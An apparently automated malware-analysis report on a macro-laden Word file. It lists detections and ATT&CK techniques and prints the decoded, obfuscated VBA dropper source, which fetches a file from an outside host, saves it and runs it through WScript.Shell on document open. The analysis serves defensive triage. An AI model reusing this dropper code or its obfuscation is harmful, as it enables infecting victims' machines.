MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. The presence of `Shell()` and `WScript.Shell` usage indicates an attempt to run external commands or scripts. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its malicious nature as a dropper. The VBA code is heavily obfuscated, but the overall intent appears to be downloading and executing a second-stage payload.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim PqhQmZrDTM As String Set HNnuICRGT = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim lRDCya As Boolean, RKLHuagrZb As Integer Set wRjSyTPI = CreateObject("MSXML2.ServerXMLHTTP.6.0") Set AKOEP = wRjSyTPI -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub MYhRUiRZW(ByVal tOmWjDSFgk As Integer, ByVal jvDRDf As Variant, ByVal msvUvsSS As Variant, ByVal GVHGCZK As Object, ByVal kmhvGVCH As Variant, ByVal WhYXd As Integer, ByVal TJWJeYR As String) CallByName GVHGCZK, TJWJeYR, 1, msvUvsSS, kmhvGVCH, jvDRDf End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim HLsPwd As Integer -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8896 bytes |
SHA-256: e73294f06b031142f1c7034bbe3b4ca1c08cf1d46c8b6093bffd95a24c7457b1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
177 of 252 identifiers look randomly generated (e.g. 'sUrCMLfXVd7KszCaVGPGfwcdMFWPJeOEG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function aeCYcvmRzZ() As Integer
NddjA
If XBccwj(5601, "k3pSD7C0CnLcxtvpucoptx12Y0y") Then
kdFtL
Else
nuvzfFK
End If
aeCYcvmRzZ = 8139
End Function
Private Sub Document_Open()
Dim HLsPwd As Integer
Dim BELWjhUu As Integer
tzUrRrvI.kcGKjoTFEl
End Sub
Private Sub jhCNBfJW()
mJgHQ False, False, 4238
gcLIjQ True
End Sub
Attribute VB_Name = "ggmTU"
Private Sub ySxskQ()
OfSXF "quhdhXT2h8SsEtmXxxDmayxsdQZ", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "SJJYZqMGpbKsWJf8GWIf0pHhS", "q93IG5Pzz5vgb7U6L8qPQrYf3QbS8Nr"
End If
End Sub
Public Function EabRjzXd(ByVal IiHcLko As String, ByVal DUVWuFXiJ As String) As String
Dim MhBQlGnSC As Boolean
Dim ofVnGX As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For lqfhfc = 1 To spVZG.KgQRkT(3700, "PePnrQ7x5JC0Hloaod4YM83gx", DUVWuFXiJ)
MhBQlGnSC = spVZG.eyoeZ(IiHcLko, "XdXG4f60nlTPJlpTyjc4GokS", spVZG.gIZpIc(DUVWuFXiJ, lqfhfc, 2535, "ws82FVVMj195PQh7CDjN5Q5UlPbZzNKf"))
sEodtQL = "8J0OI2Gn4gIStkIqEFDFjSnfyw"
If Not MhBQlGnSC Then
EabRjzXd = spVZG.egcqVU(EabRjzXd, spVZG.gIZpIc(DUVWuFXiJ, lqfhfc, 2535, "sUrCMLfXVd7KszCaVGPGfwcdMFWPJeOEG"))
End If
BhvAq = "yBN9H5ssB9zjQrc412BnYw89u79G"
Next
End Function
Private Function MXoULyrcB(ByVal kAGcfCVr As Boolean) As String
mGpHG "no7PU8UqN3994GWLCHONL4pO2S0IAB", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "Jn6byK9P0xsKD9OouAFsobGxCReMdEz", 3269, False
aEcIpbKw True
wVbejPo
MXoULyrcB = "pAKRs7uXLnDhZoaSYSru3Bmy1pH"
End Function
Attribute VB_Name = "HhgPA"
Private Sub IZvPvwXTuj()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "reWlz4oXWbmX3t6i7r"
End Sub
Public Function AKOEP() As Object
Dim lRDCya As Boolean, RKLHuagrZb As Integer
Set wRjSyTPI = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set AKOEP = wRjSyTPI
End Function
Public Function HNnuICRGT() As Object
Dim PqhQmZrDTM As String
Set HNnuICRGT = CreateObject("WScript.Shell")
End Function
Public Function UIzCFVgRb() As Object
kSeUwKWLwH = 3434
Set UIzCFVgRb = CreateObject("ADODB.Stream")
End Function
Private Sub Kdddmkn()
KbxYhbaay
AvUSfTJh "2zpBXNBTudbglUWcocqOFOlbtEKZs", "OlsREnHPMmP8fkIiQIOaF91sU5ZwXojt", False
ZOkaSukV
End Sub
Attribute VB_Name = "LPZDV"
Public Sub MYhRUiRZW(ByVal tOmWjDSFgk As Integer, ByVal jvDRDf As Variant, ByVal msvUvsSS As Variant, ByVal GVHGCZK As Object, ByVal kmhvGVCH As Variant, ByVal WhYXd As Integer, ByVal TJWJeYR As String)
CallByName GVHGCZK, TJWJeYR, 1, msvUvsSS, kmhvGVCH, jvDRDf
End Sub
Public Sub GvOWc(ByVal PkNSp As Object, ByVal pkdImvmnOW As Integer, ByVal NvdTk As String, ByVal IgMMqjdOL As String)
CallByName PkNSp, NvdTk, 1
End Sub
Public Function euIsEy(ByVal HRoHjV As String, ByVal LoyBlUMvM As String, ByVal ypqMoqEPC As Object) As Variant
Set euIsEy = CallByName(ypqMoqEPC, LoyBlUMvM, 2, HRoHjV)
End Function
Public Sub LPqmOkSW(ByVal nRgyyARc As Variant, ByVal WGqTWrH As String, ByVal xdzuKEVu As Variant, ByVal bOCYDmrV As Object)
CallByName bOCYDmrV, WGqTWrH, 1, xdzuKEVu, nRgyyARc
End Sub
Private Function QsqQkln(ByVal SdcvSMB As String, ByVal FtFUlPGYW As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "NdcBEm8US8JM2NfSZSQge", 3675
SlRmBd
End If
SCMoUyqWX
QsqQkln = "zHBRy7RqIM0bcXchBXsiE3NsL8Rl"
End Function
Public Sub VbzJQuvt(ByVal BKUqZXLGFL As Variant, ByVal nKYjgLT As String, ByVal GOstYbF As Object, ByVal FMwrsAtx As Integer, ByVal CIPNVWwVt As String)
Dim jPxhUYh As String
Dim sHOVMDuQKG As String
CallByName GOstYbF, CIPNVWwVt, 1, BKUqZXLGFL
End Sub
Public Function sGYCMZI(ByVal YFvMnpxfjS As String, ByVal igrGRVjTvH As Object) As Variant
sGYCMZI = CallByName(igrGRVjTvH, YFvMnpxfjS, 2)
End Function
Public Sub TyOcRODy(ByVal GZBzxcdnN As Variant, ByVal VBnGXSJ As String, ByVal uGxZGzWn As Object)
CallByName uGxZGzWn, VBnGXSJ, 4, GZBzxcdnN
End Sub
Attribute VB_Name = "spVZG"
Public Function eyoeZ(ByVal CWazqMqmvq As String, ByVal IqqAtdqqN As String, ByVal JAYbvbxhUq As String) As Boolean
Dim woDqeWpW As Boolean
eyoeZ = InStr(1, CWazqMqmvq, JAYbvbxhUq)
End Function
Public Function gIZpIc(ByVal ZiHeJdboO As String, ByVal bAlcltrmmR As Integer, ByVal cOfmv As Integer, ByVal XDdXTYob As String) As String
Dim GNikinOe As String
gIZpIc = Mid(ZiHeJdboO, bAlcltrmmR, 1)
End Function
Public Function KgQRkT(ByVal nGeNfOCt As Integer, ByVal RRhXKCaJc As String, ByVal wVFPJT As String) As Integer
Dim GbNUiUHw As Integer
KgQRkT = Len(wVFPJT)
End Function
Public Function egcqVU(ByVal vKIbNsOBlG As String, ByVal FAJkYVwuu As String) As String
Dim lhCGyWO As String
egcqVU = vKIbNsOBlG & FAJkYVwuu
End Function
Attribute VB_Name = "tzUrRrvI"
Private Function YqZKd() As String
YqZKd = ggmTU.EabRjzXd("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function KhlShPftoL() As String
KhlShPftoL = "jRxBBBRr9r8gXAEgVVltqsd"
End Function
Private Function zxIAP() As String
zxIAP = ggmTU.EabRjzXd("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function ZhZSRYCAl() As String
Dim lZkrz As Integer, GJjGE As String
ZhZSRYCAl = ggmTU.EabRjzXd("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function IXFItsHYcr() As String
bLjwgJSUR = "8HD8qd18P6jTWqzSlWingS04Pmb1O"
IXFItsHYcr = ggmTU.EabRjzXd("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function MHJBYstGv() As String
MHJBYstGv = kotoKYa
End Function
Private Sub pWvabeIW(ByVal iQqKRmdaVt As String, ByVal WDIYOYNYyV As String, ByVal wGcvY As Variant, ByVal lKLisa As String)
Dim wzqXnGyxhx As String
Dim JFoBQuQO As String
IaFbCbvQf = 5255
Set JCFVNKj = HhgPA.UIzCFVgRb
LPZDV.TyOcRODy 1, ggmTU.EabRjzXd("LBoZgmq/", "mTZypoeq"), JCFVNKj
LPZDV.GvOWc JCFVNKj, 8172, ggmTU.EabRjzXd("PiG1UjQ", "OipPeGni"), RHJZaLCkzT
LPZDV.VbzJQuvt wGcvY, RHJZaLCkzT, JCFVNKj, 7897, uMBXJcnEz
LPZDV.LPqmOkSW 2, ggmTU.EabRjzXd("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), iQqKRmdaVt, JCFVNKj
LPZDV.GvOWc JCFVNKj, 8172, ggmTU.EabRjzXd("KMwhE6", "6C6lo6Eswe"), RHJZaLCkzT
End Sub
Private Function LWtEfyzary() As String
LWtEfyzary = ggmTU.EabRjzXd("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function rnGQvnRSSK() As String
QhJzBSkuli = 9116
rnGQvnRSSK = ggmTU.EabRjzXd("PiG1UjQ", "OipPeGni")
End Function
Private Sub xBYopahEOA()
Dim JOyBEM As Integer
On Error GoTo ifNqQzdwr
lPYSaB MHJBYstGv, ZLJfda
nHFskkviX = "gnD46ecw8coTQnGynJ8tnJS491W1X071i"
BhdcJycNKh ZLJfda, "lV0KtTz6t51YfttGZHkdnvrO2Kp", False
Exit Sub
ifNqQzdwr:
End Sub
Private Sub lPYSaB(ByVal LVEOROhh As String, ByVal OeatOBP As String)
Set pjQzGMXv = HhgPA.AKOEP
LPZDV.MYhRUiRZW 6693, False, ggmTU.EabRjzXd("KAgQjJ2L", "GKLEAT"), pjQzGMXv, LVEOROhh, 9594, rnGQvnRSSK
LfPYoESsUK = False
LPZDV.LPqmOkSW ggmTU.EabRjzXd("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), LWtEfyzary, zxIAP, pjQzGMXv
eNLxFz = "dy2uR23r4GSLFXOoO5K2og2"
LPZDV.GvOWc pjQzGMXv, 8172, ggmTU.EabRjzXd("pZhU24tr", "SZte4ndZ"), "9SgfWqWJZeRe5fK8LbLvebf766Uih"
pWvabeIW OeatOBP, "kA2NvyX6QZAk6q6RSqqvJ", LPZDV.sGYCMZI(ggmTU.EabRjzXd("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), pjQzGMXv), "Md3ylUiOWxjPXZNLjYXYBQmf"
End Sub
Private Function zJDmhEbpJ() As String
zJDmhEbpJ = ggmTU.EabRjzXd("HqVgy4nv", "Evxvency")
End Function
Private Function RHJZaLCkzT() As String
usNmDIucf = "S5mcnAG5rxsmT61Smmp"
RHJZaLCkzT = "QHG3Vyp3paJUdrYx7cX4CJ8pQzpXJ"
End Function
Private Function EmqMH(ByVal gPzNgLiPm As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
EmqMH = "TLaeMhsgZhfByISTRDvzZ"
End Function
Private Function dbnJPiz(ByVal GptcunF As String) As String
Dim gscOCk As String
COovMr = "FmDZdRbi1RKwsOD0v"
Set cVQHwGPr = LPZDV.euIsEy(YqZKd, IXFItsHYcr, HhgPA.HNnuICRGT)
dbnJPiz = cVQHwGPr(GptcunF)
End Function
Private Function kotoKYa() As String
kotoKYa = ggmTU.EabRjzXd("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub kcGKjoTFEl()
DSFWQ = 8775
xBYopahEOA
End Sub
Private Function uMBXJcnEz() As String
uMBXJcnEz = ggmTU.EabRjzXd("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub BhdcJycNKh(ByVal AVDiSC As String, ByVal SvnOO As String, ByVal xJmlIT As Boolean)
Dim sxGhki As Integer
Dim ZTjtd As String
LPZDV.VbzJQuvt AVDiSC, KhlShPftoL, HhgPA.HNnuICRGT, 7897, zJDmhEbpJ
End Sub
Private Function ZLJfda() As String
Dim eDdXsOWx As Boolean, rfrVlXygqD As String
NzmDVOpD = False
ZLJfda = dbnJPiz(ggmTU.EabRjzXd("IV6mZvAC", "CTECMmPI")) & ZhZSRYCAl
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.